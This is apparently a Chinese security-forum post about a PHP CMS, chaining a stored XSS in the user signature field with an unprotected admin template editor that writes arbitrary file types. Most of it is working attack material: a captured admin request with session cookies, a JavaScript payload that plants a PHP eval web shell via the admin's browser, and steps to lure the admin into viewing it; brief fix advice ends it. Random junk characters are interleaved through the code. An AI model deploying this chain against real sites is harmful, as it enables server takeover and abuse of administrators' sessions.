这个 CMS 以前(90)有人发过一个 getshell,当时的问题出在后台的文件校验上。
官网已经修补了,所以重新下载了最新源码来看。
因为后台登录还需要认证码,所以注入这块就没有看。
存在存储型 XSS(用户签名字段):签名在写入数据库前没有过滤,输出时也没有编码。
漏洞文件:user/member/skin_edit.php(输出点)
, H6 e$ E2 Z' Z% ]本帖隐藏的内容<tr><td style="height:130px;"><span class="t"><i>*</i>签名:
1 I, c$ `- j$ ]; \; Y7 F 0 J/ [8 `5 E* ?
</span><textarea style="width:435px;height:120px;" id="content" name="CS_Qianm"><?php echo $cscms_qianm?>5 h: N( d: l, L
' B: R+ P7 l8 O6 Q</textarea></td></tr>& x1 |8 P9 ]5 u3 K5 S |
user/do.php(签名等资料的写入点):
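if($op=='zl'){ // profile ("资料") update
    // The CS_* variables are request-controlled; how they reach this scope is not
    // shown here (presumably a global include extracts them from $_POST — confirm).
    // empty() also rejects the literal string "0"; kept as in the original.
    if(empty($CS_QQ)||empty($CS_Nichen)||empty($CS_City)||empty($CS_Email))
        exit(Msg_Error('抱歉,请把资料填写完整!','javascript:history.go(-1);'));

    // CS_Sex is interpolated into the SQL unquoted, so string escaping would not
    // protect that position anyway; coerce it to an integer before use.
    $CS_Sex=(int)$CS_Sex;

    // NOTE(review): the remaining values are concatenated into the query with no
    // escaping visible in this file. Whether an upstream filter escapes them is not
    // shown; if it does not, this is also an SQL-injection sink. CS_Qianm is stored
    // verbatim and later echoed unencoded by user/member/skin_edit.php (the XSS sink),
    // so it must be HTML-encoded on output — filtering here alone is not sufficient.
    $sql="update ".Getdbname('user')." set CS_Nichen='".$CS_Nichen."',CS_Email='".$CS_Email."',
    CS_Sex=".$CS_Sex.",CS_City='".$CS_City."',CS_QQ='".$CS_QQ."',CS_Qianm='".$CS_Qianm."'
    where CS_Name='".$cscms_name."'";

    if($db->query($sql)){
        // The original reports success through Msg_Error as well; left unchanged.
        exit(Msg_Error('恭喜您,修改成功了!','javascript:history.go(-1);'));
    }else{
        exit(Msg_Error('抱歉,修改失败了!','javascript:history.go(-1);'));
    }
}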
签名没有任何过滤或输出编码,导致存储型 XSS。
后台看了一下,很离谱的是模板编辑处(skins.php, ac=xgmb)可以写入任意扩展名的文件,并没有限制为模板格式。
抓包如下:
. G, q' N( ~, m, m# [0 ^本帖隐藏的内容POST /admin/skins/skins.php?ac=xgmb&op=go&path=../../skins/index/html/ HTTP/1.1
) u2 `7 a; C8 Z" f& T& O + I; w7 e1 o* h h8 j$ S% p7 @
Accept: text/html, application/xhtml+xml, */*
3 a- C$ P L) G8 G, F E! R o% H - y: ^7 s5 N) c& o
Referer: http://127.0.0.1/admin/skins/ski ... l/&name=aaa.php$ h4 z% M6 r3 l+ R
' m# Q3 D7 N' L* S( B( mAccept-Language: zh-CN( s& m- S& Q( k5 }5 ~4 c
# M+ d8 E! e+ V4 \- oUser-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)) U, l/ p+ l; J( o0 l
4 F7 X# ~( _2 f- ^) g2 E' j
Content-Type: application/x-www-form-urlencoded9 e4 o( O. Q1 e9 ?) J
: }5 Y7 `1 a. m2 V3 Z& `& y0 ?* n$ z
Accept-Encoding: gzip, deflate
* n7 N, Q% d" \! z% T
& g6 H; A4 W$ v0 z! S, LHost: 127.0.0.1
% ^2 j( T& w% f/ c r6 a
! N5 z* ` ]/ t' g) s. j6 p& {Content-Length: 38
- S) {- B& w) _: D 0 |/ ~% b3 l/ K- Q8 G3 u
DNT: 1' ~$ G& E# X+ ]% |. i
' f. d; j; S: M7 y' q5 c% r4 gConnection: Keep-Alive
) Y z' u! A9 R/ T % f3 L* J: W6 d) m! V: Z# x
Cache-Control: no-cache: e" M ^( q& P/ q; w+ F
4 |" {% X) ?. H; m1 RCookie: CS_AdminID=1; CS_AdminUserName=aaaa; CS_AdminPassWord=12949e83a49a0989aa46ab7e249ca34d; CS_Quanx=0_1%2C1_1%2C1_2%2C1_3%2C1_4%2C1_5%2C2_1%2C2_2%2C2_3%2C2_4%2C2_5%2C2_6%2C2_7%2C3_1%2C3_2%2C3_3%2C3_4%2C4_1%2C4_2%2C4_3%2C4_4%2C4_5%2C4_6%2C4_7%2C5_1%2C5_2%2C5_3%2C5_4%2C5_5%2C6_1%2C6_2%2C6_3%2C7_1%2C7_2%2C8_1%2C8_2%2C8_3%2C8_4; CS_Login=980bb0dfb9c7ba8ac7676b6f4eea2c4b; CS_AdminUP=1; cs_id=2; cs_name=test; PHPSESSID=36db4a484bdbd090ad9846e3b7f65594
+ l- U" s5 u! f6 U
c6 k2 A' { x
u( S6 d2 s) z! iname=aaa.php&content=%3Cs%3E%3Ca%25%3E t* _6 y! y. i
于是构造如下 JS(放进签名里,让已登录后台的管理员去渲染):
) M; [( D. S _7 {% }1 g* u! ]本帖隐藏的内容<script>
/ d6 I* B' N/ j! D# ]thisTHost = top.location.hostname;
/ E( m! T. L! I4 ]) x7 m 3 e+ b2 N% X a; r* M6 w! X- n
thisTHost = "http://" + thisTHost + "/admin/skins/skins.php?ac=xgmb&op=go&path=../../skins/index/html/"; Y4 Z0 G4 L: m( z( S* `& l4 K' d
8 C, y" q' R) @1 r# t1 E
function PostSubmit(url, data, msg) { ( m1 o0 A4 E: X2 O- [! g
var postUrl = url;2 b+ w) p1 h, L$ y1 n: ?* B
: w) u$ _# X/ j# Z. ]
var postData = data; / r. K4 Y O2 O
var msgData = msg; ( p6 ~) r$ C/ K% ?' o8 ~1 L
var ExportForm = document.createElement("FORM"); 5 u/ G$ D8 o$ Z; x- u& ^4 [# g- g
document.body.appendChild(ExportForm);
$ S) I7 {- e: a/ P3 Q3 T ExportForm.method = "POST"; , Q. K4 Y# N. c( D. [5 |
var newElement = document.createElement("input"); 7 J. B/ p. l7 |% ?; D! q" ? ^; _
newElement.setAttribute("name", "name");
- F4 C9 j5 g9 A, c" M" h newElement.setAttribute("type", "hidden"); " F, y1 k) H; z* |; r
var newElement2 = document.createElement("input"); , K( p- s7 X1 s; U2 n2 V, u
newElement2.setAttribute("name", "content"); 5 z% j! Y; t7 r& V$ a( Y4 B! _
newElement2.setAttribute("type", "hidden"); * r, p/ ?6 u$ M2 a
ExportForm.appendChild(newElement); ( Q9 P9 Z" @' P& d! n
ExportForm.appendChild(newElement2);
+ T) B7 ^5 \ D' ^4 ~. T9 {/ p newElement.value = postData;
6 L. i: M4 |8 f2 V7 S1 n newElement2.value = msgData; : a) ]% e8 B( r( }6 U5 c' j
ExportForm.action = postUrl;
( O! E) \2 Z- J- u# R ExportForm.submit();
: F& v* J4 r& j V, ]% S};
4 l' c5 s$ T- f6 S2 @4 u+ r
$ Y& b: ?2 `5 j$ E8 [- YPostSubmit(thisTHost,"roker.php","<?php @eval($_POST[123]);?>");
0 u+ U. l+ G, h: @/ y. E
6 x+ j1 K4 \4 u% u( o</script>/ z0 c! {/ l# S# K, D# j2 p
在 http://127.0.0.1/user/space.php?ac=edit&op=zl 的修改签名处插入上面的脚本。
然后用你的账号给管理员写一封私信,或者让他访问你的主页 http://127.0.0.1/home/?uid=2(uid 按实际修改)。
管理员在持有后台会话的浏览器里打开该页面时,脚本会带着他的 Cookie 提交上面那个 POST,于是在 skins\index\html\ 目录下生成 roker.php 一句话木马。
前提:管理员必须在同一浏览器里已登录后台,这条链才成立;漏洞的本质是"签名未编码输出 + 后台模板编辑无 CSRF 防护且不限制扩展名"。修复建议:skin_edit.php 输出 $cscms_qianm 时用 htmlspecialchars 编码;do.php 入库前做过滤;skins.php 增加 CSRF 令牌、限制可写扩展名并校验 path 不能越出模板目录。